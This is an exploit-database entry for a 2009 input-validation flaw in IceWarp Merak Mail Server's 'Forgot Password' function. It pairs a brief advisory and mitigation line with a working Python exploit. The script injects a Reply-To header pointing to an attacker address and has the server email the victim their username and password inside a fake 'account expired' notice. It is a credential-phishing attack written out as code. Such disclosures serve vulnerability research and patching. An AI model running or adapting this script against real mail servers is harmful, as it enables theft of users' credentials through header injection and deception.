header-logo
Suggest Exploit
vendor:
Merak Mail Server
by:
SecurityFocus
7.5
CVSS
HIGH
Input Validation Vulnerability
20
CWE
Product Name: Merak Mail Server
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

IceWarp Merak Mail Server Input Validation Vulnerability

IceWarp Merak Mail Server is prone to an input-validation vulnerability because it uses client-supplied data when performing a 'Forgot Password' function. Attackers can exploit this issue via social-engineering techniques to obtain valid users' login credentials; other attacks may also be possible.

Mitigation:

Input validation should be performed to ensure that untrusted data is not used to perform sensitive operations.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/34827/info

IceWarp Merak Mail Server is prone to an input-validation vulnerability because it uses client-supplied data when performing a 'Forgot Password' function.

Attackers can exploit this issue via social-engineering techniques to obtain valid users' login credentials; other attacks may also be possible.

#! /usr/bin/env python
import urllib2, sys

conf = {
 "captcha_uid": "5989688782215156001239966846169",
 "captcha": "4SJZ Z4GY",
 "forgot": "user@example.com",
 "replyto": "attacker@example.com",
 "server": "http://www.example.com/webmail/server/webmail.php"
}

data = """
<iq type="set">
 <query xmlns="webmail:iq:auth">
   <forgot>%(forgot)s</forgot>
   <captcha uid="%(captcha_uid)s">%(captcha)s</captcha>
   <subject>
     <![CDATA[
       Account expiration %EMAIL%\r\nReply-To: %(replyto)s\n
     ]]>
   </subject>
   <message>
     Dear %FULLNAME%,

     your account

     Username: %USERNAME%
     Password: %PASSWORD%

     has expired. To renew the account, please reply to this email
     leaving the email body intact, so we know the account is still
     used.

     Kind regards,

     the IT department
   </message>
 </query>
</iq>
""" % conf

req = urllib2.Request(conf['server'])
req.add_data(data)
res = urllib2.urlopen(req)
print repr(res.read())